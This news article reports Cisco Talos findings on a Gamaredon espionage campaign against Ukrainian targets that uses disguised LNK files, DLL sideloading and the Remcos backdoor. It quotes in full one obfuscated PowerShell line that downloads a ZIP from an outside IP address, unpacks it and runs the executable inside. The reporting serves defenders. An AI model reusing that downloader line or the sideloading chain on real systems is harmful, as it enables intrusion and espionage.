Gamaredon Hacker Group Using Weaponize LNK Files To Drop Remcos Backdoor on Windows

A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group.

The attackers are leveraging weaponized LNK files disguised as Office documents to deliver the Remcos backdoor malware, utilizing themes related to troop movements in Ukraine as a social engineering lure to trick victims into executing the malicious files.

The attack begins when victims receive ZIP archives containing LNK shortcuts masquerading as important military documents with names like “Probable location of communication nodes, electronic warfare installations and enemy UAV calculations” and “Coordinates of enemy takeoffs for 8 days.”

When executed, these shortcuts silently run PowerShell code that initiates the infection chain while displaying a decoy document to maintain the illusion of legitimacy.

Cisco Talos researchers identified this campaign has been active since at least November 2024, with evidence suggesting Gamaredon is specifically targeting Ukrainian government organizations, critical infrastructure, and entities affiliated with Ukraine’s defense and security apparatus.

The researchers noted the advanced evasion techniques employed throughout the attack chain.

The PowerShell downloader utilizes obfuscation methods to evade detection, communicating with geo-fenced servers located in Russia and Germany to retrieve the second-stage payload.

This selective targeting restricts access to the malicious payloads to victims located within Ukraine, helping the campaign remain under the radar.

The threat actors employ a particularly effective technique whereby PowerShell executes commands indirectly through the Get-Command cmdlet to bypass string-based detection by security solutions:-

if (-not(Test-Path tvdiag.''z''i''p -PathType Leaf))\{\&(g' cm) -uri ht''tp'':'/'/'146'.'1''85''.''233''.''96''/xallat/tvdiag.''zi''p -OutFile tvdiag.''zi''p\}; Expand-Archive -Path tvdiag.''zi''p -DestinationPath Drvx64; star''t Drvx64/TiVoDiag.''e''xe;

DLL Sideloading Technique

The second-stage payload employs DLL sideloading, a sophisticated technique where legitimate applications are abused to load malicious code.

In this case, clean applications like TiVoDiag.exe load malicious DLLs such as “mindclient.dll” during execution. The malicious DLL then decrypts and executes the final Remcos backdoor payload from encrypted files within the downloaded ZIP archive.

This technique takes advantage of the Windows DLL search order, allowing attackers to place their malicious DLL alongside a legitimate executable.

When the executable runs and attempts to load a required DLL, it loads the malicious version instead due to Windows’ predictable search paths.

Once executed, the Remcos payload injects itself into the Explorer.exe process and establishes communication with command and control servers, primarily hosted on GTHost and HyperHosting infrastructure.

The backdoor uses port 6856 for command and control operations, enabling the attackers to maintain persistent access to compromised systems for espionage purposes.

This campaign demonstrates Gamaredon’s continued focus on cyber espionage against Ukrainian targets, with the group adapting its tactics to include commercial malware alongside its custom tools.

Organizations in Ukraine and allied nations should implement recommended security measures and monitor for indicators of compromise associated with this campaign.

The post Gamaredon Hacker Group Using Weaponize LNK Files To Drop Remcos Backdoor on Windows appeared first on Cyber Security News.